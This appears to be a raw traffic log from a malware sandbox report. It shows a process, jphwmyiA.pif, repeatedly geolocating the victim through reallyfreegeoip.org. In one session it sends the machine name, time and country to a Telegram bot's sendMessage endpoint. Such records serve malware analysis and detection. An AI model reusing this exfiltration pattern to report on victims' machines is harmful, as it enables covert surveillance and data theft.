                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          3 | 192.168.2.5 | 53582 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:17 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:17 UTC | 850 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:17 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461246
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aoNwveNeeb2eUb8XDhblTmBZG5SaHdMJ92myKeNo7HxuKki9Sm3KDJ9t%2BzrxeqXuqnAAhXz2g30nt6NhvqYTTgteC4kt5ComcpvttfDS2zmVzqZ9EsaV8UcUKeXNZxX480l7mwW1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbbe9da40f43-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1636&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1750599&cwnd=32&unsent_bytes=0&cid=e1f4ebd3dea185aa&ts=155&x=0"
                                                                                                                                          2025-01-06 06:54:17 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          4 | 192.168.2.5 | 53591 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:18 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:19 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:19 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461248
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aCiDaoKnepmgsy%2BquECAmIZogswgb9e5osPap6V%2FAD5VKnPITieF%2FydxFLM3ofdB1L00q0z8LLNbCxHxeFkPcakj2%2FTjSboJsdaWMCg8i%2F9g29IWRCXGntEOTG4SWHSgzVvuCtNz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbc8bbdd4295-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1712&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1663817&cwnd=252&unsent_bytes=0&cid=e0793f58be739003&ts=144&x=0"
                                                                                                                                          2025-01-06 06:54:19 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          5 | 192.168.2.5 | 53604 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:20 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:20 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:20 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461249
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWmyelvs5PxPPhrBRnJCwrx6QnId1jxNka2%2BV2rTY5qLUiW8Q7HaPUO7yB%2BMC8H9mfsdiDz5iygKcEnI5MPkSeCB7Iw0llTEsHuFtmr6IyqXtqoLuhNZQs58BX%2BXriUVeGLPOR%2FN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbd18e85de92-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1456&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1932495&cwnd=246&unsent_bytes=0&cid=13e32961770a267d&ts=147&x=0"
                                                                                                                                          2025-01-06 06:54:20 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          6 | 192.168.2.5 | 53612 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:21 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:22 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:22 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461251
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wo9EkUV40RF0qcEL5r63%2BlZhu2mpkYTZ2KjdciMaoTCj7LgiYiY3diNNb6%2F9vZgEMqla%2FWeLrh184t7nODDi0JsOml2%2BWOfzvHU7CG45e8ALyjpdPQsqUcaT%2FMsocMljdNqcD2RD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbdbea88efa9-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2005&rtt_var=772&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1399137&cwnd=158&unsent_bytes=0&cid=1f88f0b69e3768cc&ts=151&x=0"
                                                                                                                                          2025-01-06 06:54:22 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          7 | 192.168.2.5 | 53624 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:23 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:23 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:23 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461252
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wu4W0a%2FNPbbKen0pZz5TQ7tDGqz%2BJld6vJaxg0ms0ptrIs%2BgUoJ1zeaDEsk8FOafP3KzFNCfGmCw3UwFY8MyD5sqqGeLQsZhVpIFH5uV%2Bv5P7BL5cfZr4AaTJcHCAtCPCsC8VekL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbe49de4c328-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1632&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1755862&cwnd=177&unsent_bytes=0&cid=735a7068e5f059b1&ts=155&x=0"
                                                                                                                                          2025-01-06 06:54:23 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          8 | 192.168.2.5 | 53636 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:24 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:24 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461253
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2B1il1lvb4T8V7sjJYuLD8uOaAYTzo0s7cLQMKuH10%2FmOt9P4ueDUVrzFi68wC%2BoIjgUcQILM3BIUs4xjzKvvnLsQ1f%2BxjTaIyngnMR%2FtgYjF8552PtClyT9HMfD6mrk6Tm4gGLr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbecfe0f43c2-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1794714&cwnd=162&unsent_bytes=0&cid=da25282e4e71a675&ts=170&x=0"
                                                                                                                                          2025-01-06 06:54:24 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          9 | 192.168.2.5 | 53637 | 188.114.97.3 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2025-01-06 06:54:24 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:24 UTC854INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461253
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hV9wAzLSkUuKSNQY5URKRpPV9PmAPJc729xGDFfF1gL2K6UVEi%2Bi7iWJJODk8hKkXLBIZYLLK9ypy6LQxHLprD9mmf2sIyipft08rJ9bCq27FGYremVDQqzjfaQAOmwL%2F%2BdeIbK3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbed4f784273-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1775&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1632196&cwnd=32&unsent_bytes=0&cid=020eb63f55741d7b&ts=142&x=0"
2025-01-06 06:54:24 UTC | 362 | IN
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 53643 | 149.154.167.220 | 443 | 7208 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:25 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-06 06:54:25 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:25 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:54:25 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 53644 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:25 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-06 06:54:25 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:25 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461254
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHK8k1sTlefWu7XbDssev%2BIhyN8qdJkFUjndizeeAB6retYQnqtEAHY%2BFaRusmDA621uCodsR3v6LQIyrYcLfjzKD%2Fkutz95Mw4NefjxDUd3KdSLbDls%2BpbDLPVnuEa9wZxQusBs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbf27fa18c89-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1761&rtt_var=688&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1558996&cwnd=202&unsent_bytes=0&cid=0e4caa62b51caf5e&ts=156&x=0"
2025-01-06 06:54:25 UTC | 362 | IN
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 53657 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:27 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:27 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:27 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461256
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTBjnRSux85wMqOO2zPipvBXJkITZf6Q5UZ6eRHqUwa7eic0Xl6ayUdxKt8uZHgar9D2edjHuynkXXBHBahGvmrphu38KN2UiGBg%2BjOXjzc4iHPUCDkN8nHBzxUJIAkpQzJERI3l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbfdcf0342be-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1692&rtt_var=673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1580086&cwnd=213&unsent_bytes=0&cid=11eab855c418c4d2&ts=161&x=0"
2025-01-06 06:54:27 UTC | 362 | IN
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 53667 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:28 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:28 UTC | 867 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:28 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461258
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzm%2BsE4m5jVdSlP4BWZB1Q2%2BGOcoLy9QX7R6TWHyfT1nbo85jU%2BnwOtfuZR5DJR2Pg1V8Donri3m49t4A%2FHKMi%2BzPHg%2BXQcY7ZoUUa8jocZxUpGG1oO%2FHy%2FPaY4dI%2BOtTWXsSuWp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc06a8668c59-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1801&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1604395&cwnd=196&unsent_bytes=0&cid=8ba1ad52375b5f16&ts=135&x=0"
2025-01-06 06:54:28 UTC | 362 | IN
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 53677 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:30 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:30 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:30 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461259
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3De0hopA1eHegT%2Bpl%2BCT1aBd2hKH6AtwnpDrkYtWrs%2B8qJ4uhWD15%2F7x%2FI9s7EH0pxk1auafIOr%2FWp1jKatBVer0TUTJuM3sWwHm544hZkpf1bOTYE1yNDA2PUuVJBdAcKSx6cDy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc0fd8710f80-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1463&rtt_var=556&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1957104&cwnd=207&unsent_bytes=0&cid=07c4690c4864d2df&ts=137&x=0"
2025-01-06 06:54:30 UTC | 362 | IN
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 53689 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:31 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:31 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461260
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mc2C12fYYb3Fvduzhqhs7qRKMo8hShgD%2F%2FGv2TAB3z3KUlPI3u22CLh%2B0Q4AU4doUEtEqNfGlGrWYZk%2Bshf5Rc4gjpFjxooXIG3rbnwk8DGUKT33h1v%2FpqyOT8nPUVYlrk9eaLCQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc189ff178e7-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1444829&cwnd=234&unsent_bytes=0&cid=0cbb088b91578400&ts=157&x=0"
                                                                                                                                          2025-01-06 06:54:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 53696 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:32 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:32 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:54:32 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1461261
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=on72%2BeUOPlKGHX9wXf%2BjoxWb8saqnXoTrnZG8mRhABrFdXiauZ29MmKds4GK0Svh4D3o021zIXXxN48vxNg3IH9vFZjuEuAJI3v3xp74DelQkUKIFviS847bMgsmLJORv%2BdgHKsl"}],"group":"cf-nel","max_age":604800}
